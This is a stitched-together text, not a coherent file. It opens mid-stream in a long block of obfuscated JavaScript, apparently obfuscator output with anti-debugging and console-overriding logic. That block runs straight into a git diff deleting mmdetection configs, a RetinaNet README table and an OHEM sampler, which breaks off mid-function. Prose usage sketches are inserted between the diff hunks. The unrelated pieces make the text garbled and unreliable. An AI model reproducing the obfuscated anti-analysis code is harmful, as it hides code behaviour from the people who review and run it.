_0x282ffb[_0xbac4c8(0x5a8,0x4cd,0x59d,0x562,0x5f9)](_0x4af744,_0x105044);},'ITDzW':_0x282ffb[_0x5c0c41(0x503,0x572,0x51a,0x4a3,0x517)],'eRUXM':_0x282ffb[_0x5c0c41(0x563,0x4d2,0x4b6,0x4a7,0x4bf)],'LszCS':function(_0x55ab82,_0x22aa12){function _0x106af0(_0x584c7e,_0x4cf0ad,_0x1ec564,_0xd50cf2,_0x27ec41){return _0x201965(_0x4cf0ad-0xe6,_0x4cf0ad-0x1b4,_0x1ec564-0xd3,_0xd50cf2-0x10b,_0x27ec41);}return _0x282ffb[_0x106af0(0x4d,-0x83,-0xa1,0x3b,0x1d)](_0x55ab82,_0x22aa12);},'rUHin':function(_0x834a0d,_0x2cf650){function _0x4faab1(_0x3eab21,_0x574b84,_0x258d40,_0x5cc16d,_0x4f143e){return _0x411b77(_0x3eab21-0xdc,_0x574b84-0x1b1,_0x4f143e- -0x439,_0x5cc16d-0x121,_0x5cc16d);}return _0x282ffb[_0x4faab1(0xe4,0x17f,0xe4,-0xc,0x90)](_0x834a0d,_0x2cf650);},'djCCi':function(_0x1ab457,_0x3e0c48){function _0x296fea(_0xab10bb,_0x58a0d3,_0x324572,_0x5885b3,_0x3d2bfb){return _0x201965(_0x58a0d3-0xa2,_0x58a0d3-0x14b,_0x324572-0x75,_0x5885b3-0x17c,_0xab10bb);}return _0x282ffb[_0x296fea(-0xe8,-0xc7,-0xd3,-0xd5,-0x28)](_0x1ab457,_0x3e0c48);},'aytnA':function(_0x12a463,_0x10cb92){function _0x5eceb1(_0x251321,_0xc75e,_0x5448e3,_0x346e1f,_0x2ccec8){return _0x201965(_0x346e1f-0x383,_0xc75e-0xc,_0x5448e3-0x6a,_0x346e1f-0x21,_0x5448e3);}return _0x282ffb[_0x5eceb1(0x27b,0x323,0x34c,0x267,0x335)](_0x12a463,_0x10cb92);},'CuVjr':function(_0x38a62d,_0x5ded7e){function _0x3bbaaa(_0x19bbf2,_0x394392,_0x2789db,_0x17a76f,_0x5402de){return _0x5c0c41(_0x5402de- -0x5c3,_0x394392-0x3a,_0x2789db-0x184,_0x2789db,_0x5402de-0x188);}return _0x282ffb[_0x3bbaaa(-0x134,-0x81,0x5,0xe,-0x53)](_0x38a62d,_0x5ded7e);},'DCpBU':function(_0x3e273f,_0x4c9d44,_0x48d026,_0xc40e6e){function _0x2693b5(_0x1ae9c7,_0x308a50,_0x1db235,_0x556205,_0x35bd47){return _0x411b77(_0x1ae9c7-0x1b3,_0x308a50-0x1e7,_0x308a50- -0x6be,_0x556205-0x1db,_0x556205);}return _0x282ffb[_0x2693b5(-0xc2,-0x162,-0x1df,-0x1a3,-0x16c)](_0x3e273f,_0x4c9d44,_0x48d026,_0xc40e6e);},'xqvBr':_0x282ffb[_0x201965(-0x1b1,-0xe7,-0x176,-0x1a8,-0x17c)],'stdmP':function(_0x2d7f48,_0xc0c4fd){function _0x374c6c(_0x2ac0f6,_0x24011f,_0x544ace,_0x3b79ec,_0x5230e9){return _0x5e92f3(_0x2ac0f6-0x1ed,_0x24011f-0x1b,_0x24011f,_0x3b79ec-0x42,_0x2ac0f6-0x3e1);}return _0x282ffb[_0x374c6c(0x11e,0x1e4,0x191,0x76,0xa8)](_0x2d7f48,_0xc0c4fd);},'MBAXm':function(_0xb5d3c0,_0xdae8d2,_0x36472f){function _0x761dda(_0x18cd2b,_0x262764,_0x4fc80e,_0x5a0bd8,_0x4784a4){return _0x411b77(_0x18cd2b-0x82,_0x262764-0x138,_0x4fc80e-0x36,_0x5a0bd8-0x11b,_0x262764);}return _0x282ffb[_0x761dda(0x52c,0x48d,0x441,0x4a7,0x48f)](_0xb5d3c0,_0xdae8d2,_0x36472f);},'FDrfr':_0x282ffb[_0x201965(-0x13b,-0x106,-0x185,-0x15f,-0xb7)]};function _0x5c0c41(_0x53af84,_0x3381b9,_0x5d9d7c,_0x289e9d,_0x27e88b){return _0x33b0a4(_0x53af84-0x4ad,_0x3381b9-0x9a,_0x5d9d7c-0x13f,_0x289e9d-0x56,_0x289e9d);}function _0x337983(_0x50500b,_0xaa8704,_0x343b7f,_0x18236a,_0x809259){return _0x33b0a4(_0xaa8704-0x7a,_0xaa8704-0x1ec,_0x343b7f-0x67,_0x18236a-0xee,_0x18236a);}if(_0x282ffb[_0x201965(-0x1f2,-0x23e,-0x1dc,-0x1e5,-0x2ad)](_0x282ffb[_0x411b77(0x449,0x2fb,0x38f,0x2d8,0x3fd)],_0x282ffb[_0x201965(-0x135,-0x198,-0xcd,-0x10b,-0x103)])){if(_0x43bad9){if(_0x282ffb[_0x5e92f3(-0x2b8,-0x2c0,-0x293,-0x1ee,-0x1e1)](_0x282ffb[_0x5e92f3(-0x1d9,-0x19d,-0x14a,-0x269,-0x1c3)],_0x282ffb[_0x5c0c41(0x56e,0x4f0,0x5c0,0x624,0x489)])){const _0x5cff73=_0x43bad9[_0x337983(0xfc,0x179,0x229,0x1b3,0x147)](_0x50be46,arguments);return _0x43bad9=null,_0x5cff73;}else{const _0x268914={'PSHak':_0x34305b[_0x337983(0x159,0x12a,0x5a,0xd0,0x131)],'KMlbm':function(_0x60d444,_0x2ced96){function 
_0x274a73[_0x315baa(-0xda,0x0,0x2,0x9,0xe0)](_0x101893,0x70e+0x101f*0x1+-0x172d);}}else{if(_0x274a73[_0x56c700(0x67,0x11d,0x15f,0x1e7,0x136)](_0x274a73[_0x292b63(-0x131,-0x1f4,-0x2c4,-0x2a0,-0x237)],_0x274a73[_0x56c700(0x1ed,0x244,0x23f,0x20a,0x156)])){if(_0x274a73[_0x292b63(-0x19f,-0x1ce,-0x29f,-0x168,-0x108)](_0x274a73[_0x292b63(-0x3af,-0x2ef,-0x294,-0x30e,-0x279)]('',_0x274a73[_0x1df5ce(-0x1de,-0x105,-0x15f,-0x1cc,-0x134)](_0x1f2ebb,_0x1f2ebb))[_0x274a73[_0x292b63(-0x31e,-0x26c,-0x2ea,-0x219,-0x336)]],0x1*0x1894+-0x1e6*-0x1+-0x1*0x1a79)||_0x274a73[_0x286c2e(0x43d,0x3e5,0x311,0x416,0x43e)](_0x274a73[_0x315baa(-0xaf,0x96,-0xa9,0x38,0x8a)](_0x1f2ebb,-0x2647+0x990+0x51*0x5b),0xcc7+-0x226d+0xa3*0x22)){if(_0x274a73[_0x286c2e(0x3f5,0x360,0x279,0x44d,0x392)](_0x274a73[_0x56c700(0x1f2,0x110,0x125,0x1e3,0x1bd)],_0x274a73[_0x292b63(-0x1dc,-0x18d,-0x205,-0x22b,-0x9d)])){const _0x43262d=_0x684335[_0x1df5ce(-0x277,-0x27f,-0x1e6,-0x26d,-0x1a7)+_0x292b63(-0x2bf,-0x2da,-0x33f,-0x355,-0x39f)+'r'][_0x315baa(0x124,0x161,0x15b,0x189,0x137)+_0x56c700(0xc9,0x184,0x95,0x1ea,0x11b)][_0x315baa(0x151,0xf0,0x77,0xae,0x11)](_0x260ca5),_0x4d05b3=_0x30fcfe[_0x4bcff0],_0x246e19=_0xf77b38[_0x4d05b3]||_0x43262d;_0x43262d[_0x56c700(0x1c7,0x1b1,0x61,0x5f,0xf1)+_0x286c2e(0x1ed,0x296,0x1d7,0x256,0x2c8)]=_0xcfbab7[_0x286c2e(0x3db,0x334,0x362,0x3c2,0x2f8)](_0x4d58aa),_0x43262d[_0x286c2e(0x4d8,0x427,0x3bd,0x449,0x514)+_0x292b63(-0x33f,-0x300,-0x3bb,-0x2d9,-0x31a)]=_0x246e19[_0x286c2e(0x388,0x427,0x4b6,0x380,0x517)+_0x286c2e(0x2ec,0x288,0x204,0x28e,0x302)][_0x286c2e(0x3fe,0x334,0x3c7,0x32e,0x397)](_0x246e19),_0x146534[_0x4d05b3]=_0x43262d;}else(function(){function _0x211536(_0x2a2ec9,_0x41a5df,_0x1cc2c8,_0x448a30,_0x2348d1){return _0x56c700(_0x2a2ec9-0x55,_0x41a5df-0x130,_0x1cc2c8-0x121,_0x2348d1,_0x448a30- -0x104);}function _0x33fd27(_0x1fc3cd,_0x4560b,_0xd10f2,_0xc63e04,_0x369d8b){return _0x315baa(_0x1fc3cd-0x9d,_0x4560b-0x15d,_0xd10f2-0xd9,_0xd10f2-0x3ee,_0x4560b);}function _0x30472a(_0x1059da,_0x359c8f,_0x26274b,_0x233917,_0x2a0e44){return _0x315baa(_0x1059da-0x129,_0x359c8f-0x27,_0x26274b-0x38,_0x233917-0x2c0,_0x1059da);}function _0x4e1c90(_0x134d49,_0x5ecc47,_0x5b5911,_0x3c7817,_0xe475e2){return _0x1df5ce(_0xe475e2,_0x5ecc47-0x130,_0x5b5911-0x124,_0x3c7817-0xcb,_0x5b5911-0x179);}function _0x2c9db6(_0x47552d,_0x1bb639,_0x3ea939,_0x234693,_0x386f79){return _0x286c2e(_0x47552d-0x1ae,_0x234693- -0x287,_0x3ea939-0xfb,_0x234693-0xa3,_0x1bb639);}if(_0x274a73[_0x2c9db6(-0x79,-0x4,-0x56,0x5d,-0x4)](_0x274a73[_0x2c9db6(0x85,0x8c,-0x33,-0x1e,0xd3)],_0x274a73[_0x33fd27(0x416,0x3c0,0x3d1,0x338,0x3b2)]))return!![];else _0xbe906e[_0x30472a(0x245,0x2c3,0x367,0x2db,0x31f)](_0x4e1c90(-0xe0,-0x51,-0x101,-0x1c5,-0x150)+_0x33fd27(0x4b2,0x432,0x422,0x3b7,0x3ae)+_0x2c9db6(0x17d,0x113,0x1e8,0x13a,0x1fc)+_0x211536(-0xa,0x132,-0x56,0x43,0xff)+_0x2c9db6(0xb0,0x191,0x146,0xe7,0xa)+'\x20'+_0x398d92);}[_0x286c2e(0x300,0x38e,0x3eb,0x3f6,0x311)+_0x292b63(-0x244,-0x2da,-0x2ec,-0x349,-0x2e8)+'r'](_0x274a73[_0x56c700(-0x27,0xee,-0x81,0xab,0x5b)](_0x274a73[_0x286c2e(0x3ec,0x407,0x4b0,0x38d,0x4f8)],_0x274a73[_0x56c700(0xcb,0x78,0x51,0x183,0x137)]))[_0x292b63(-0x2a8,-0x319,-0x273,-0x357,-0x308)](_0x274a73[_0x286c2e(0x43f,0x35f,0x2eb,0x346,0x38e)]));}else 
_0x274a73[_0x286c2e(0x22d,0x311,0x2b1,0x3d3,0x243)](_0x274a73[_0x286c2e(0x430,0x356,0x441,0x369,0x424)],_0x274a73[_0x286c2e(0x38b,0x38c,0x3ff,0x47c,0x3f2)])?_0x1f49b7[_0x315baa(-0xd3,0x100,0xef,0x1b,0xfc)](_0x1df5ce(-0x140,-0x25e,-0x234,-0x19a,-0x1f7)+_0x286c2e(0x242,0x287,0x328,0x1b0,0x1cb)+_0x315baa(0x134,-0x1f,0xf0,0x68,0x12c)+_0x292b63(-0x143,-0x1f9,-0x22b,-0x131,-0x2cc)+_0x286c2e(0x4c6,0x40e,0x41a,0x32f,0x494)+_0x286c2e(0x3e8,0x326,0x2ae,0x2a5,0x3a6)+_0x16a84a):function(){function _0x3daebb(_0x9a03ab,_0x37dd8e,_0x520996,_0x7d7599,_0x428686){return _0x56c700(_0x9a03ab-0x2,_0x37dd8e-0x8d,_0x520996-0xde,_0x520996,_0x37dd8e- -0x35);}function _0x4a4d08(_0x148057,_0x2bddf0,_0x49762d,_0x459365,_0x46d29a){return _0x292b63(_0x148057-0xb9,_0x459365-0x113,_0x46d29a,_0x459365-0x53,_0x46d29a-0x35);}function _0x35a402(_0x423f90,_0x5e706b,_0x5d8a0d,_0x117a44,_0x56245b){return _0x1df5ce(_0x423f90,_0x5e706b-0x102,_0x5d8a0d-0x7c,_0x117a44-0x10d,_0x5e706b-0x5f0);}function _0x5a477a(_0x11ee68,_0x4912c5,_0x47236b,_0x2f288e,_0x117b0e){return _0x292b63(_0x11ee68-0x1bf,_0x11ee68-0x5d3,_0x4912c5,_0x2f288e-0xa,_0x117b0e-0x1be);}if(_0x36d494[_0x3daebb(0x19c,0x10b,0xb2,0xc4,0x1d1)](_0x36d494[_0x3daebb(0x11f,0x127,0x166,0x141,0x1ec)],_0x36d494[_0x3daebb(0xd6,0xcd,0x9a,0x5a,0xdf)])){const _0x50f770=_0x1e56db[_0x4a4d08(-0x89,-0x3e,-0xb1,-0x95,-0x74)](_0x342abc,arguments);return _0x2dfae9=null,_0x50f770;}else return![];}[_0x292b63(-0x234,-0x1fa,-0x15d,-0x22f,-0x22d)+_0x1df5ce(-0x29e,-0x288,-0x2ed,-0x2a3,-0x287)+'r'](_0x274a73[_0x286c2e(0x2d9,0x28a,0x288,0x1e0,0x1e4)](_0x274a73[_0x286c2e(0x41b,0x407,0x486,0x35a,0x34c)],_0x274a73[_0x286c2e(0x356,0x375,0x45c,0x3af,0x387)]))[_0x286c2e(0x44b,0x3e0,0x3d9,0x33a,0x413)](_0x274a73[_0x286c2e(0x292,0x329,0x30f,0x3ad,0x26c)]);}else{const _0x1e6bb6=_0x122d56[_0x1df5ce(-0x137,-0x102,-0xa6,-0x7b,-0x155)](_0x680e0c,arguments);return _0x47d3e4=null,_0x1e6bb6;}}_0x274a73[_0x315baa(0x12d,0xe5,0xb4,0x5c,0x137)](_0x4dacc1,++_0x1f2ebb);}else{let _0x4d39a7;try{const _0x57e87a=_0x36d494[_0x56c700(0x221,0x2b3,0x285,0x18a,0x1fd)](_0x5e3f46,_0x36d494[_0x286c2e(0x31e,0x2cb,0x341,0x26f,0x36f)](_0x36d494[_0x1df5ce(-0x28d,-0x23d,-0x246,-0x179,-0x263)](_0x36d494[_0x56c700(0x1ae,0x121,0xc8,0x1d5,0x142)],_0x36d494[_0x292b63(-0x217,-0x19d,-0x18f,-0x18c,-0x1fe)]),');'));_0x4d39a7=_0x36d494[_0x315baa(0x1b0,0xb5,0x59,0xe3,0xa4)](_0x57e87a);}catch(_0x18b37e){_0x4d39a7=_0x24fb6b;}const _0x510e9f=_0x4d39a7[_0x292b63(-0x365,-0x2be,-0x37e,-0x366,-0x2c7)+'le']=_0x4d39a7[_0x315baa(0x12f,0x49,0xe7,0x44,0x13)+'le']||{},_0x1bc6ab=[_0x36d494[_0x56c700(0x199,0x1ac,0x100,0xd4,0xc8)],_0x36d494[_0x292b63(-0x241,-0x1c0,-0x219,-0x134,-0x2b0)],_0x36d494[_0x56c700(0xfc,0xfa,0x209,0x134,0x149)],_0x36d494[_0x56c700(0xfb,0xcb,0x122,0xfb,0x50)],_0x36d494[_0x1df5ce(-0x1fd,-0x7c,-0xb9,-0x16c,-0x11d)],_0x36d494[_0x1df5ce(-0x249,-0x1ef,-0xcf,-0x1a8,-0x15d)],_0x36d494[_0x292b63(-0x260,-0x20d,-0x1b5,-0x219,-0x1b9)]];for(let _0x228541=-0x264e+0x112e+0x1520;_0x36d494[_0x1df5ce(-0x1d6,-0x167,-0x2e2,-0x236,-0x1f1)](_0x228541,_0x1bc6ab[_0x292b63(-0x2a9,-0x2b4,-0x2d2,-0x24a,-0x317)+'h']);_0x228541++){const 
_0x3d0927=_0x275b00[_0x286c2e(0x38f,0x38e,0x472,0x3c2,0x450)+_0x315baa(-0x23,0xd,0xdc,0x28,-0x26)+'r'][_0x1df5ce(-0xc0,-0x1d0,-0x1a3,-0x45,-0x126)+_0x292b63(-0x24f,-0x22f,-0x235,-0x21c,-0x1ed)][_0x1df5ce(-0x203,-0x2d3,-0x243,-0x136,-0x201)](_0x50ba5a),_0x4f0687=_0x1bc6ab[_0x228541],_0x44c38c=_0x510e9f[_0x4f0687]||_0x3d0927;_0x3d0927[_0x1df5ce(-0x179,-0x2e7,-0x239,-0x127,-0x206)+_0x56c700(0xd9,-0x85,0x122,0xda,0x58)]=_0x366acb[_0x292b63(-0x2fa,-0x254,-0x22c,-0x1e1,-0x30d)](_0x5ce843),_0x3d0927[_0x56c700(0x1f1,0x135,0x17a,0x26b,0x1e9)+_0x315baa(0x9c,-0x50,-0x79,0x2,0xbc)]=_0x44c38c[_0x315baa(0x22a,0x144,0x144,0x1a1,0x17c)+_0x56c700(-0x64,0xbb,0xb7,0xa0,0x4a)][_0x1df5ce(-0x187,-0x25e,-0x246,-0x13f,-0x201)](_0x44c38c),_0x510e9f[_0x4f0687]=_0x3d0927;}}}function _0x4c92c1(_0x31556a,_0x459b40,_0x395ee7,_0x195162,_0x4d9d70){return _0x504eae(_0x459b40-0xc1,_0x459b40-0xa1,_0x395ee7-0x126,_0x195162-0xed,_0x195162);}function _0x5ef808(_0x313b76,_0x3f475c,_0x527422,_0x576a4e,_0xd60573){return _0x1d31e6(_0x576a4e- -0x345,_0x3f475c-0x74,_0xd60573,_0x576a4e-0x156,_0xd60573-0xa9);}function _0x163385(_0x27c341,_0x53ff3b,_0x3d059a,_0x536423,_0x42ac09){return _0x5b3717(_0x27c341- -0x66,_0x3d059a,_0x3d059a-0xa,_0x536423-0xce,_0x42ac09-0x2e);}function _0x37219c(_0xca9036,_0x4dc92e,_0x422991,_0x54701d,_0x40f6bf){return _0x1e3602(_0xca9036-0xa4,_0x40f6bf,_0x422991-0x126,_0x422991-0x2b2,_0x40f6bf-0x46);}try{if(_0x274a73[_0x4c92c1(0x484,0x3ee,0x351,0x351,0x438)](_0x274a73[_0x163385(-0x1f7,-0x2a5,-0x1bb,-0x148,-0x226)],_0x274a73[_0x5ef808(-0x11f,-0x228,-0x277,-0x1f7,-0x2c2)])){if(_0x505d61){if(_0x274a73[_0x3c56c7(0x37f,0x312,0x357,0x2e0,0x2b6)](_0x274a73[_0x4c92c1(0x275,0x34e,0x301,0x3ad,0x294)],_0x274a73[_0x37219c(0x34c,0x1c9,0x274,0x1b7,0x302)]))_0x274a73[_0x5ef808(-0x28f,-0x303,-0x372,-0x2a8,-0x24f)](_0x478d65,-0xe9*0x13+0x7b8+0x993);else return _0x4dacc1;}else{if(_0x274a73[_0x163385(-0x265,-0x2d8,-0x2c6,-0x349,-0x24c)](_0x274a73[_0x37219c(0x336,0x29f,0x249,0x2eb,0x268)],_0x274a73[_0x5ef808(-0x20d,-0x12a,-0x19a,-0x1d1,-0x21f)]))_0x274a73[_0x5ef808(-0x22a,-0x36f,-0x2bd,-0x2a8,-0x2b0)](_0x4dacc1,-0x231+-0x3*0xcdb+0x28c2);else{let _0x5d9b75;try{_0x5d9b75=_0x274a73[_0x5ef808(-0x23d,-0x2cd,-0x274,-0x271,-0x2c9)](_0x58446f,_0x274a73[_0x5ef808(-0x2bd,-0x136,-0x214,-0x1f9,-0x150)](_0x274a73[_0x4c92c1(0x30d,0x38b,0x2b8,0x352,0x325)](_0x274a73[_0x4c92c1(0x3ba,0x2ce,0x296,0x295,0x2ea)],_0x274a73[_0x3c56c7(0x1ce,0x17d,0x137,0x18b,0x20d)]),');'))();}catch(_0x724811){_0x5d9b75=_0xa22605;}return _0x5d9b75;}}}else{if(_0x47e411){const _0x386471=_0x3c6c2a[_0x4c92c1(0x4c4,0x43e,0x415,0x449,0x374)](_0x5e66a5,arguments);return _0x2b067c=null,_0x386471;}}}catch(_0x399381){}}
diff --git a/spaces/Andy1621/uniformer_image_detection/configs/ms_rcnn/ms_rcnn_r50_fpn_1x_coco.py b/spaces/Andy1621/uniformer_image_detection/configs/ms_rcnn/ms_rcnn_r50_fpn_1x_coco.py
deleted file mode 100644
index 0a163ce445c35d51a9d8940e46697c5c6a39d354..0000000000000000000000000000000000000000
--- a/spaces/Andy1621/uniformer_image_detection/configs/ms_rcnn/ms_rcnn_r50_fpn_1x_coco.py
+++ /dev/null
@@ -1,16 +0,0 @@
-_base_ = '../mask_rcnn/mask_rcnn_r50_fpn_1x_coco.py'
-model = dict(
- type='MaskScoringRCNN',
- roi_head=dict(
- type='MaskScoringRoIHead',
- mask_iou_head=dict(
- type='MaskIoUHead',
- num_convs=4,
- num_fcs=2,
- roi_feat_size=14,
- in_channels=256,
- conv_out_channels=256,
- fc_out_channels=1024,
- num_classes=80)),
- # model training and testing settings
- train_cfg=dict(rcnn=dict(mask_thr_binary=0.5)))
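For context, a minimal sketch (not part of the diff above) of how a Mask Scoring R-CNN config like the deleted `ms_rcnn_r50_fpn_1x_coco.py` is typically loaded so that the `_base_` inheritance resolves; the relative path assumes a local mmdetection checkout.

```python
# Sketch only: inspect how `_base_` merging resolves for this config.
from mmcv import Config

cfg = Config.fromfile('configs/ms_rcnn/ms_rcnn_r50_fpn_1x_coco.py')

# Everything not overridden above is inherited from mask_rcnn_r50_fpn_1x_coco.py.
print(cfg.model.type)                                # MaskScoringRCNN
print(cfg.model.roi_head.mask_iou_head.num_classes)  # 80
print(cfg.pretty_text[:400])                         # resolved config, human readable
```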
diff --git a/spaces/Andy1621/uniformer_image_detection/configs/retinanet/README.md b/spaces/Andy1621/uniformer_image_detection/configs/retinanet/README.md
deleted file mode 100644
index 6b66534218139fea8200fa522a02b8fc35500dd7..0000000000000000000000000000000000000000
--- a/spaces/Andy1621/uniformer_image_detection/configs/retinanet/README.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Focal Loss for Dense Object Detection
-
-## Introduction
-
-[ALGORITHM]
-
-```latex
-@inproceedings{lin2017focal,
- title={Focal loss for dense object detection},
- author={Lin, Tsung-Yi and Goyal, Priya and Girshick, Ross and He, Kaiming and Doll{\'a}r, Piotr},
- booktitle={Proceedings of the IEEE international conference on computer vision},
- year={2017}
-}
-```
-
-## Results and models
-
-| Backbone | Style | Lr schd | Mem (GB) | Inf time (fps) | box AP | Config | Model | Log |
-| :-------------: | :-----: | :-----: | :------: | :------------: | :----: | :------: | :--------: | :--------: |
-| R-50-FPN | caffe | 1x | 3.5 | 18.6 | 36.3 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_r50_caffe_fpn_1x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r50_caffe_fpn_1x_coco/retinanet_r50_caffe_fpn_1x_coco_20200531-f11027c5.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r50_caffe_fpn_1x_coco/retinanet_r50_caffe_fpn_1x_coco_20200531_012518.log.json) |
-| R-50-FPN | pytorch | 1x | 3.8 | 19.0 | 36.5 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_r50_fpn_1x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r50_fpn_1x_coco/retinanet_r50_fpn_1x_coco_20200130-c2398f9e.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r50_fpn_1x_coco/retinanet_r50_fpn_1x_coco_20200130_002941.log.json) |
-| R-50-FPN | pytorch | 2x | - | - | 37.4 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_r50_fpn_2x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r50_fpn_2x_coco/retinanet_r50_fpn_2x_coco_20200131-fdb43119.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r50_fpn_2x_coco/retinanet_r50_fpn_2x_coco_20200131_114738.log.json) |
-| R-101-FPN | caffe | 1x | 5.5 | 14.7 | 38.5 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_r101_caffe_fpn_1x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r101_caffe_fpn_1x_coco/retinanet_r101_caffe_fpn_1x_coco_20200531-b428fa0f.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r101_caffe_fpn_1x_coco/retinanet_r101_caffe_fpn_1x_coco_20200531_012536.log.json) |
-| R-101-FPN | pytorch | 1x | 5.7 | 15.0 | 38.5 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_r101_fpn_1x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r101_fpn_1x_coco/retinanet_r101_fpn_1x_coco_20200130-7a93545f.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r101_fpn_1x_coco/retinanet_r101_fpn_1x_coco_20200130_003055.log.json) |
-| R-101-FPN | pytorch | 2x | - | - | 38.9 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_r101_fpn_2x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r101_fpn_2x_coco/retinanet_r101_fpn_2x_coco_20200131-5560aee8.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_r101_fpn_2x_coco/retinanet_r101_fpn_2x_coco_20200131_114859.log.json) |
-| X-101-32x4d-FPN | pytorch | 1x | 7.0 | 12.1 | 39.9 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_x101_32x4d_fpn_1x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_32x4d_fpn_1x_coco/retinanet_x101_32x4d_fpn_1x_coco_20200130-5c8b7ec4.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_32x4d_fpn_1x_coco/retinanet_x101_32x4d_fpn_1x_coco_20200130_003004.log.json) |
-| X-101-32x4d-FPN | pytorch | 2x | - | - | 40.1 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_x101_32x4d_fpn_2x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_32x4d_fpn_2x_coco/retinanet_x101_32x4d_fpn_2x_coco_20200131-237fc5e1.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_32x4d_fpn_2x_coco/retinanet_x101_32x4d_fpn_2x_coco_20200131_114812.log.json) |
-| X-101-64x4d-FPN | pytorch | 1x | 10.0 | 8.7 | 41.0 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_x101_64x4d_fpn_1x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_64x4d_fpn_1x_coco/retinanet_x101_64x4d_fpn_1x_coco_20200130-366f5af1.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_64x4d_fpn_1x_coco/retinanet_x101_64x4d_fpn_1x_coco_20200130_003008.log.json) |
-| X-101-64x4d-FPN | pytorch | 2x | - | - | 40.8 | [config](https://github.com/open-mmlab/mmdetection/tree/master/configs/retinanet/retinanet_x101_64x4d_fpn_2x_coco.py) | [model](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_64x4d_fpn_2x_coco/retinanet_x101_64x4d_fpn_2x_coco_20200131-bca068ab.pth) | [log](http://download.openmmlab.com/mmdetection/v2.0/retinanet/retinanet_x101_64x4d_fpn_2x_coco/retinanet_x101_64x4d_fpn_2x_coco_20200131_114833.log.json) |
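As a hedged illustration of how the checkpoints in this table are usually consumed, the sketch below runs mmdetection's high-level inference API on the R-50-FPN 1x entry; the local config path and the `demo.jpg` test image are assumptions, while the checkpoint URL is taken from the table above.

```python
# Sketch only: single-image inference with a RetinaNet checkpoint from the table.
from mmdet.apis import init_detector, inference_detector

config_file = 'configs/retinanet/retinanet_r50_fpn_1x_coco.py'
checkpoint = ('http://download.openmmlab.com/mmdetection/v2.0/retinanet/'
              'retinanet_r50_fpn_1x_coco/'
              'retinanet_r50_fpn_1x_coco_20200130-c2398f9e.pth')

model = init_detector(config_file, checkpoint, device='cuda:0')
result = inference_detector(model, 'demo.jpg')  # one bbox array per COCO class
```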
diff --git a/spaces/Andy1621/uniformer_image_detection/mmdet/core/bbox/samplers/ohem_sampler.py b/spaces/Andy1621/uniformer_image_detection/mmdet/core/bbox/samplers/ohem_sampler.py
deleted file mode 100644
index 8b99f60ef0176f1b7a56665fb0f59272f65b84cd..0000000000000000000000000000000000000000
--- a/spaces/Andy1621/uniformer_image_detection/mmdet/core/bbox/samplers/ohem_sampler.py
+++ /dev/null
@@ -1,107 +0,0 @@
-import torch
-
-from ..builder import BBOX_SAMPLERS
-from ..transforms import bbox2roi
-from .base_sampler import BaseSampler
-
-
-@BBOX_SAMPLERS.register_module()
-class OHEMSampler(BaseSampler):
- r"""Online Hard Example Mining Sampler described in `Training Region-based
- Object Detectors with Online Hard Example Mining
- `_.
- """
-
- def __init__(self,
- num,
- pos_fraction,
- context,
- neg_pos_ub=-1,
- add_gt_as_proposals=True,
- **kwargs):
- super(OHEMSampler, self).__init__(num, pos_fraction, neg_pos_ub,
- add_gt_as_proposals)
- self.context = context
- if not hasattr(self.context, 'num_stages'):
- self.bbox_head = self.context.bbox_head
- else:
- self.bbox_head = self.context.bbox_head[self.context.current_stage]
-
- def hard_mining(self, inds, num_expected, bboxes, labels, feats):
- with torch.no_grad():
- rois = bbox2roi([bboxes])
- if not hasattr(self.context, 'num_stages'):
- bbox_results = self.context._bbox_forward(feats, rois)
- else:
- bbox_results = self.context._bbox_forward(
- self.context.current_stage, feats, rois)
- cls_score = bbox_results['cls_score']
- loss = self.bbox_head.loss(
- cls_score=cls_score,
- bbox_pred=None,
- rois=rois,
- labels=labels,
- label_weights=cls_score.new_ones(cls_score.size(0)),
- bbox_targets=None,
- bbox_weights=None,
- reduction_override='none')['loss_cls']
- _, topk_loss_inds = loss.topk(num_expected)
- return inds[topk_loss_inds]
-
- def _sample_pos(self,
- assign_result,
- num_expected,
- bboxes=None,
- feats=None,
- **kwargs):
- """Sample positive boxes.
-
- Args:
- assign_result (:obj:`AssignResult`): Assigned results
- num_expected (int): Number of expected positive samples
- bboxes (torch.Tensor, optional): Boxes. Defaults to None.
- feats (list[torch.Tensor], optional): Multi-level features.
- Defaults to None.
-
- Returns:
- torch.Tensor: Indices of positive samples
- """
- # Sample some hard positive samples
- pos_inds = torch.nonzero(assign_result.gt_inds > 0, as_tuple=False)
- if pos_inds.numel() != 0:
